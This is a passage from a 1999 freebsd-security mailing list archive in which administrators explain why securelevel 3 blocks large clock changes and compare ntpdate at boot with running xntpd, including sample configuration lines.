Goran" at "Aug 18, 1999 09:54:53 pm" To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran) Date: Thu, 19 Aug 1999 11:19:18 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG ('freebsd-security@FreeBSD.ORG') X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lowkrantz, Goran writes: > Just found that I can't correct the time on my firewall, running at security > level 3. When I try I get the following: > > date: settimeofday (timeval): Operation not permitted > > Is this by design? If so, why? Yes, this is to prevent attacks that use wrong time settings. You are allowed to change the time a little bit, just not a lot. The solution would be to do somthing like this.. - At boot time, before setting the securelevel, run ntpdate - Run xntpd normally -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 14:52:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id DDE4E15255 for ; Thu, 19 Aug 1999 14:52:27 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id OAA14293; Thu, 19 Aug 1999 14:50:02 -0700 (PDT) Received: from utah.XYLAN.COM by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id OAA29487; Thu, 19 Aug 1999 14:43:37 -0700 Received: from softweyr.com by utah.XYLAN.COM (SMI-8.6/SMI-SVR4 (xylan utah [SPOOL])) id PAA15433; Thu, 19 Aug 1999 15:49:43 -0600 Message-ID: <37BC7BF7.B261D91A@softweyr.com> Date: Thu, 19 Aug 1999 15:49:43 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: "Childers, Richard" Cc: "'marc rassbach '" , "'Narvi '" , "'Brett Glass '" , "'Jordan K. Hubbard '" , "'James Gill '" , "'freebsd-security@FreeBSD.ORG '" Subject: Re: OpenBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Childers, Richard" wrote: > > "And if no such place on this planet can be found, in a few years, > there's always a space station." > > Or a satellite; there are are several amateur radio satellites in orbit, > several of them operate on 2 meters or 10 meters (they act as store and > forward packet digipeaters) ... and I've been noticing that web servers have > been getting pretty small, physically speaking ... You get it set up, I'll get it launched for you. My Alma Mater is working on a new recycled launch platform to get their latest satellite in orbit: http://catsis.weber.edu/mediarelations/PressRelease/1998/021798cast.htm I worked on the tracking software for Weber's first satellite, NUSAT-1. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 15:20:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 2C9ED151BD for ; Thu, 19 Aug 1999 15:20:35 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA22977; Thu, 19 Aug 1999 16:20:25 -0600 (MDT) Message-Id: <4.2.0.58.19990819161554.04790800@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Thu, 19 Aug 1999 16:17:20 -0600 To: Archie Cobbs , Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran) From: Brett Glass Subject: Re: Securelevel 3 ant setting time Cc: freebsd-security@FreeBSD.ORG ('freebsd-security@FreeBSD.ORG') In-Reply-To: <199908191819.LAA94866@bubba.whistle.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My server uses a cron job and ntpupdate to grab tne time from the best of several accurate government servers. Would securelevel 3 allow this? --Brett Glass At 11:19 AM 8/19/99 -0700, Archie Cobbs wrote: >Lowkrantz, Goran writes: > > Just found that I can't correct the time on my firewall, running at security > > level 3. When I try I get the following: > > > > date: settimeofday (timeval): Operation not permitted > > > > Is this by design? If so, why? > >Yes, this is to prevent attacks that use wrong time settings. >You are allowed to change the time a little bit, just not a lot. > >The solution would be to do somthing like this.. > > - At boot time, before setting the securelevel, run ntpdate > - Run xntpd normally > >-Archie > >___________________________________________________________________________ >Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 15:32:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 767FC1548A for ; Thu, 19 Aug 1999 15:31:48 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id QAA04414; Thu, 19 Aug 1999 16:30:47 -0600 (MDT) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.3/8.9.1) id QAA52873; Thu, 19 Aug 1999 16:30:47 -0600 (MDT) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Thu, 19 Aug 1999 16:30:47 -0600 (MDT) From: "David G. Andersen" To: Brett Glass Cc: Archie Cobbs , Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG ('freebsd-security@FreeBSD.ORG') Subject: Re: Securelevel 3 ant setting time In-Reply-To: Brett Glass's message of Thu, August 19 1999 <4.2.0.58.19990819161554.04790800@localhost> References: <199908191819.LAA94866@bubba.whistle.com> <4.2.0.58.19990819161554.04790800@localhost> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14268.33906.359749.40458@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Maybe". (Probably?) When ntpdate sees a small time delta (less than 1/2 second off), it will use the adjtime() call to slew the clock time, which is permitted. However, if the delta is large for some reason, then it will go in and use the sledgehammer approach - settimeofday(). >From the ntpdate manpage: The latter technique is less disruptive and more accurate when the offset is small, and works quite well when ntpdate is run by cron(8) every hour or two. So, you'll probably be OK doing it that way, *but* if you get too far off during the time period, then you won't be able to correct for it. -Dave Lo and Behold, Brett Glass said: > My server uses a cron job and ntpupdate to grab tne time from the > best of several accurate government servers. Would securelevel 3 allow > this? -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah CS Department http://www.angio.net/ "If you haul a geek up a crack, you will bloody their fingers for a day... If you teach a geek to climb, you will bloody their fingers for life." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 15:46:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from bifrost.infologigruppen.se (ns2.infologigruppen.se [212.214.163.69]) by hub.freebsd.org (Postfix) with ESMTP id 58E9814D4E for ; Thu, 19 Aug 1999 15:46:22 -0700 (PDT) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: (from uucp@localhost) by bifrost.infologigruppen.se (8.9.2/8.8.8) id AAA16214; Fri, 20 Aug 1999 00:54:41 +0200 (CEST) (envelope-from Goran.Lowkrantz@infologigruppen.se) Received: from valhall.ign.se(192.168.3.1) via SMTP by bifrost-net.ign.se, id smtpdk16212; Fri Aug 20 00:54:37 1999 Received: by valhall.ign.se with Internet Mail Service (5.5.2448.0) id ; Fri, 20 Aug 1999 00:46:14 +0200 Message-ID: From: "Lowkrantz, Goran" To: "'David G. Andersen'" Cc: freebsd-security@FreeBSD.ORG Subject: RE: Securelevel 3 ant setting time Date: Fri, 20 Aug 1999 00:46:13 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="windows-1252" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I got it working. I added a script to /usr/local/etc/rc.d that run ntpdate during boot before securlevel is set. I made it a small script as I check time from a few servers and if one don't work, I test with the next one. Thanks, GLZ -----Original Message----- From: David G. Andersen [mailto:danderse@cs.utah.edu] Sent: Friday, August 20, 1999 12:31 AM To: Brett Glass Cc: Archie Cobbs; Goran.Lowkrantz@infologigruppen.se; freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time "Maybe". (Probably?) When ntpdate sees a small time delta (less than 1/2 second off), it will use the adjtime() call to slew the clock time, which is permitted. However, if the delta is large for some reason, then it will go in and use the sledgehammer approach - settimeofday(). >From the ntpdate manpage: The latter technique is less disruptive and more accurate when the offset is small, and works quite well when ntpdate is run by cron(8) every hour or two. So, you'll probably be OK doing it that way, *but* if you get too far off during the time period, then you won't be able to correct for it. -Dave Lo and Behold, Brett Glass said: > My server uses a cron job and ntpupdate to grab tne time from the > best of several accurate government servers. Would securelevel 3 allow > this? -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah CS Department http://www.angio.net/ "If you haul a geek up a crack, you will bloody their fingers for a day... If you teach a geek to climb, you will bloody their fingers for life." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 16:15:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from dt010nb9.san.rr.com (dt010nb9.san.rr.com [204.210.12.185]) by hub.freebsd.org (Postfix) with ESMTP id F1A81152B4 for ; Thu, 19 Aug 1999 16:15:22 -0700 (PDT) (envelope-from Doug@gorean.org) Received: from localhost (doug@localhost) by dt010nb9.san.rr.com (8.9.3/8.8.8) with ESMTP id QAA59807; Thu, 19 Aug 1999 16:14:42 -0700 (PDT) (envelope-from Doug@gorean.org) Date: Thu, 19 Aug 1999 16:14:42 -0700 (PDT) From: Doug X-Sender: doug@dt010nb9.san.rr.com To: Brett Glass Cc: Archie Cobbs , Lowkrantz Goran , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Securelevel 3 ant setting time In-Reply-To: <4.2.0.58.19990819161554.04790800@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 19 Aug 1999, Brett Glass wrote: > My server uses a cron job and ntpupdate to grab tne time from the > best of several accurate government servers. Would securelevel 3 allow > this? If you're going to do this anyway, why not just use xntpd? It's more reliable, has better mechanisms to resolve the skew between your various times sources, and will keep your clock within the range of adjustments that are allowable in securelevel 3. Doug -- On account of being a democracy and run by the people, we are the only nation in the world that has to keep a government four years, no matter what it does. -- Will Rogers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 17:31: 7 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 8E20315221 for ; Thu, 19 Aug 1999 17:30:59 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id RAA22415; Thu, 19 Aug 1999 17:29:16 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908200029.RAA22415@gndrsh.dnsmgr.net> Subject: Re: Securelevel 3 ant setting time In-Reply-To: <14268.33906.359749.40458@torrey.cs.utah.edu> from "David G. Andersen" at "Aug 19, 1999 04:30:47 pm" To: danderse@cs.utah.edu (David G. Andersen) Date: Thu, 19 Aug 1999 17:29:15 -0700 (PDT) Cc: brett@lariat.org (Brett Glass), archie@whistle.com (Archie Cobbs), Goran.Lowkrantz@infologigruppen.se (Lowkrantz Goran), freebsd-security@FreeBSD.ORG ('freebsd-security@FreeBSD.ORG') X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > "Maybe". (Probably?) > > When ntpdate sees a small time delta (less than 1/2 second off), it > will use the adjtime() call to slew the clock time, which is > permitted. However, if the delta is large for some reason, then it > will go in and use the sledgehammer approach - settimeofday(). > > >From the ntpdate manpage: > > The latter technique is less disruptive and > more accurate when the offset is small, and works quite well when ntpdate > is run by cron(8) every hour or two. > > So, you'll probably be OK doing it that way, *but* if you get too far > off during the time period, then you won't be able to correct for it. You can compile ntp/xntpd with the -DSLEWALWAYS option and it will work for you. I had to go grep the source to make sure that ntpdate obeyed this and it does: ntpdate/ntpdate.c:#ifdef SLEWALWAYS ntpdate/ntpdate.c:#else /* SLEWALWAYS */ ntpdate/ntpdate.c:#endif /* SLEWALWAYS */ Though a quick reading of the code shows that it does not remove -b as a valid option, and from a quick lookover this should probably just be a runtime option instead of a compile time option.... > -Dave > > Lo and Behold, Brett Glass said: > > My server uses a cron job and ntpupdate to grab tne time from the > > best of several accurate government servers. Would securelevel 3 allow > > this? > > -- > work: danderse@cs.utah.edu me: angio@pobox.com > University of Utah CS Department http://www.angio.net/ > "If you haul a geek up a crack, you will bloody their fingers for a day... > If you teach a geek to climb, you will bloody their fingers for life." > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 19 17:36:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 816721518D for ; Thu, 19 Aug 1999 17:36:44 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id RAA22564; Thu, 19 Aug 1999 17:34:53 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908200034.RAA22564@gndrsh.dnsmgr.net> Subject: Re: Securelevel 3 ant setting time In-Reply-To: from "Lowkrantz, Goran" at "Aug 20, 1999 00:46:13 am" To: Goran.Lowkrantz@infologigruppen.se (Lowkrantz, Goran) Date: Thu, 19 Aug 1999 17:34:53 -0700 (PDT) Cc: danderse@cs.utah.edu ('David G. Andersen'), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="windows-1252" [Charset windows-1252 unsupported, skipping...] Please don't do that Windoze crudd... Hi, I got it working. I added a script to /usr/local/etc/rc.d that run ntpdate during boot before securlevel is set. I made it a small script as I check time from a few servers and if one don't work, I test with the next one. You should let ntpdate make those decisions for you, list ALL of the time servers on the one command line: ntpdate clock.llnl.gov ntp.someisp.there date.someotherisp.here my.clock.server Is much much much better than a loop over 4 calls to ntpdate, as ntpdate knows a lot more about time protocols and will generate a best time using the data from 1 to N of the clocks given as arguments. Please read the man pages... Thanks, GLZ -----Original Message----- From: David G. Andersen [mailto:danderse@cs.utah.edu] Sent: Friday, August 20, 1999 12:31 AM To: Brett Glass Cc: Archie Cobbs; Goran.Lowkrantz@infologigruppen.se; freebsd-security@FreeBSD.ORG Subject: Re: Securelevel 3 ant setting time "Maybe". (Probably?) When ntpdate sees a small time delta (less than 1/2 second off), it will use the adjtime() call to slew the clock time, which is permitted. However, if the delta is large for some reason, then it will go in and use the sledgehammer approach - settimeofday(). >From the ntpdate manpage: The latter technique is less disruptive and more accurate when the offset is small, and works quite well when ntpdate is run by cron(8) every hour or two. So, you'll probably be OK doing it that way, *but* if you get too far off during the time period, then you won't be able to correct for it. -Dave Lo and Behold, Brett Glass said: > My server uses a cron job and ntpupdate to grab tne time from the > best of several accurate government servers. Would securelevel 3 allow > this? -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah CS Department http://www.angio.net/ "If you haul a geek up a crack, you will bloody their fingers for a day... If you teach a geek to climb, you will bloody their fingers for life." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 3: 4: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id C062E14BF1 for ; Fri, 20 Aug 1999 03:04:06 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id EAA27567; Fri, 20 Aug 1999 04:03:48 -0600 (MDT) Message-Id: <4.2.0.58.19990820035954.04757b80@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Fri, 20 Aug 1999 04:03:42 -0600 To: Doug From: Brett Glass Subject: Re: Securelevel 3 ant setting time Cc: Archie Cobbs , Lowkrantz Goran , "'freebsd-security@FreeBSD.ORG'" In-Reply-To: References: <4.2.0.58.19990819161554.04790800@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 04:14 PM 8/19/99 -0700, Doug wrote: > If you're going to do this anyway, why not just use xntpd? It's >more reliable, has better mechanisms to resolve the skew between your >various times sources, and will keep your clock within the range of >adjustments that are allowable in securelevel 3. I looked at the man page for xntpd once, and walked away (well, VIRTUALLY walked away) scratching my head. It was totally opaque. There was no simple information about how to synchronize with the NIST every so often; also, it appeared that one needed to leave a large, expensive daemon running all the time. So, I went with ntpdate, which was simple and easy to understand (and which got out of the way after it adjusted the clock). The system with the worst clock drifts no more than 5 minutes every 12 hours -- and that, I suspect, is mainly due to busy-waits with interrupts off in the ATAPI driver. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 8:26: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id D5FF315355 for ; Fri, 20 Aug 1999 08:25:58 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11HqYE-0004Q8-00; Fri, 20 Aug 1999 09:25:55 -0600 Message-ID: <37BD7381.80939A1@softweyr.com> Date: Fri, 20 Aug 1999 09:25:53 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Doug , Archie Cobbs , Lowkrantz Goran , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Securelevel 3 ant setting time References: <4.2.0.58.19990819161554.04790800@localhost> <4.2.0.58.19990820035954.04757b80@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 04:14 PM 8/19/99 -0700, Doug wrote: > > > If you're going to do this anyway, why not just use xntpd? It's > >more reliable, has better mechanisms to resolve the skew between your > >various times sources, and will keep your clock within the range of > >adjustments that are allowable in securelevel 3. > > I looked at the man page for xntpd once, and walked away (well, > VIRTUALLY walked away) scratching my head. It was totally opaque. > There was no simple information about how to synchronize with the NIST > every so often; also, it appeared that one needed to leave a large, > expensive daemon running all the time. Yes, you have to leave the daemon running. At 140K text, it's not all that large. If you want to customize it and throw out all the clock drives you won't be using, it would probably cut the size by half. You have to leave the daemon running becuase it is a lot smarter about updating the clock than you are. It will update it more often when it has to, until it gets the clock tuned to where it is mostly accurate, then slow down it's rate of adjustment once your clock is not drifting too far. Even on systems where the clock isn't very good, it usually only takes a few hours for ntp to get it close, and then it only has to tickle it once or twice an hour. > So, I went with ntpdate, which > was simple and easy to understand (and which got out of the way after > it adjusted the clock). The system with the worst clock drifts no more > than 5 minutes every 12 hours -- and that, I suspect, is mainly due to > busy-waits with interrupts off in the ATAPI driver. Using ntpdate, if your clock isn't very accurate, it will never become accurate, because ntpdate doesn't adjust the clock RATE, just the current time setting. It is solving an entirely different problem. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 8:52:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from neptune.psn.net (neptune.psn.net [207.211.58.16]) by hub.freebsd.org (Postfix) with ESMTP id 3CC9C1534F for ; Fri, 20 Aug 1999 08:52:35 -0700 (PDT) (envelope-from will@shadow.blackdawn.com) Received: from 5042-243.008.popsite.net ([209.224.140.243] helo=shadow.blackdawn.com) by neptune.psn.net with esmtp (PSN Internet Service 2.12 #3) id 11Hqxd-0004Lp-00; Fri, 20 Aug 1999 08:52:10 -0700 Received: (from will@localhost) by shadow.blackdawn.com (8.9.3/8.9.2) id LAA08892; Fri, 20 Aug 1999 11:52:05 -0400 (EDT) (envelope-from will) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <4.2.0.58.19990820035954.04757b80@localhost> Date: Fri, 20 Aug 1999 11:52:04 -0400 (EDT) Reply-To: Will Andrews From: Will Andrews To: Brett Glass Subject: Re: Securelevel 3 ant setting time Cc: "freebsd-security@FreeBSD.ORG" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 20-Aug-99 Brett Glass wrote: > I looked at the man page for xntpd once, and walked away (well, > VIRTUALLY walked away) scratching my head. It was totally opaque. > There was no simple information about how to synchronize with the NIST > every so often; also, it appeared that one needed to leave a large, > expensive daemon running all the time. So, I went with ntpdate, which > was simple and easy to understand (and which got out of the way after > it adjusted the clock). The system with the worst clock drifts no more > than 5 minutes every 12 hours -- and that, I suspect, is mainly due to > busy-waits with interrupts off in the ATAPI driver. Simple xntpd: # echo "server time.nist.gov" > /etc/ntp.conf # echo "driftfile /etc/ntp.drift" >> /etc/ntp.conf # echo "xntpd_enable=\"YES\"" >> /etc/rc.conf # echo "xntpd_flags=\"-c /etc/ntp.conf -p /var/run/xntpd.pid\"" >> /etc/rc.conf # xntpd -c /etc/ntp.conf -p /var/run/xntpd.pid This will suit most people. However, you should also have ntp in your syslog.conf and /var/log/ntp.log should exist. See the syslog.conf(5) manpage, read about "facilities". Xntpd is not that difficult. Unlike ntpdate, it can update your system clock while also acting as a time server for your local network, reducing bandwidth costs (yes, minimal, if you have a very small network, but still worth time and money.) It is also more reliable and far more featureful than ntpdate (hey, encryption compensation!). As for "large, expensive daemon", that is incorrect. xntpd barely takes 1MB of total RAM on my machine, and usually close to zero CPU. -- Will Andrews To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 9:29:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from dt011n65.san.rr.com (dt010nb9.san.rr.com [204.210.12.185]) by hub.freebsd.org (Postfix) with ESMTP id 147C914CB9 for ; Fri, 20 Aug 1999 09:29:04 -0700 (PDT) (envelope-from Doug@gorean.org) Received: from gorean.org (master [10.0.0.2]) by dt011n65.san.rr.com (8.9.3/8.8.8) with ESMTP id JAA66866; Fri, 20 Aug 1999 09:26:38 -0700 (PDT) (envelope-from Doug@gorean.org) Message-ID: <37BD81C7.46F9F9E3@gorean.org> Date: Fri, 20 Aug 1999 09:26:47 -0700 From: Doug Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.61 [en] (X11; U; FreeBSD 4.0-CURRENT-0815 i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Archie Cobbs , Lowkrantz Goran , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Securelevel 3 ant setting time References: <4.2.0.58.19990819161554.04790800@localhost> <4.2.0.58.19990820035954.04757b80@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brett Glass wrote: > > At 04:14 PM 8/19/99 -0700, Doug wrote: > > > If you're going to do this anyway, why not just use xntpd? It's > >more reliable, has better mechanisms to resolve the skew between your > >various times sources, and will keep your clock within the range of > >adjustments that are allowable in securelevel 3. > > I looked at the man page for xntpd once, and walked away (well, > VIRTUALLY walked away) scratching my head. It was totally opaque. Yeah, I admit it's pretty dense stuff. However once you get a feel for it IMO it's one of the more amazing pieces of software on the 'net. Take a look at http://www.eecis.udel.edu/~ntp/, and especially the list of public stratum 3 servers. It's generally considered rude to synch a workstation to a stratum 1 or 2 server, and you won't notice the few milliseconds difference anyway. Once you have a list of 4 or 5 servers that have good (and diverse) network topology to your site, put them in a ntp.conf file like this: server best.or.closest.site prefer server second.best.site server third.best.site server etc.... driftfile /etc/ntp.drift And you're done. Fire up xntpd and it will start synching your clock. In your /etc/rc.conf enable ntpdate and xntpd and put in the first server on your list as the flag argument to ntpdate. Overall you will probably find that the system load is less with xntpd because it does its job more slowly, and keeps the clock closer in synch. Here are some figures to contrast with on my P5 150 system that's been up for two weeks: UID PRI NI VSZ RSS TIME COMMAND 0 18 0 0 0 10:09.23 (syncer) 0 2 0 568 400 4:53.42 /sbin/natd -dynamic -n ep0 0 2 -12 1032 648 3:26.28 xntpd -p /var/run/xntpd.pid 0 2 0 1472 968 1:43.72 /usr/local/sbin/httpd 65534 99 0 816 488 12386:31.83 /usr/local/distributed.net/rc5des -quiet Hope this helps, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 9:55: 3 1999 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 1978E14D70 for ; Fri, 20 Aug 1999 09:55:00 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id SAA04549; Fri, 20 Aug 1999 18:52:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Doug Cc: Brett Glass , Archie Cobbs , Lowkrantz Goran , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Securelevel 3 ant setting time In-reply-to: Your message of "Fri, 20 Aug 1999 09:26:47 PDT." <37BD81C7.46F9F9E3@gorean.org> Date: Fri, 20 Aug 1999 18:52:52 +0200 Message-ID: <4547.935167972@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <37BD81C7.46F9F9E3@gorean.org>, Doug writes: >> >> I looked at the man page for xntpd once, and walked away (well, >> VIRTUALLY walked away) scratching my head. It was totally opaque. > > Yeah, I admit it's pretty dense stuff. However once you get a feel for it >IMO it's one of the more amazing pieces of software on the 'net. Take a >look at http://www.eecis.udel.edu/~ntp/, and especially the list of public >stratum 3 servers. It's generally considered rude to synch a workstation to >a stratum 1 or 2 server, and you won't notice the few milliseconds >difference anyway. Once you have a list of 4 or 5 servers that have good >(and diverse) network topology to your site, put them in a ntp.conf file >like this: Actually, 4 or 5 is too many, it encourages xntpd to switch too often, three seems to be the best and most stable conf. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 11:31: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from finland.ispro.net.tr (finland.ispro.net.tr [195.174.18.1]) by hub.freebsd.org (Postfix) with ESMTP id B277E14F19 for ; Fri, 20 Aug 1999 11:30:54 -0700 (PDT) (envelope-from yurtesen@ispro.net.tr) Received: from ispro.net.tr (dyn-0-095.tku.netti.fi 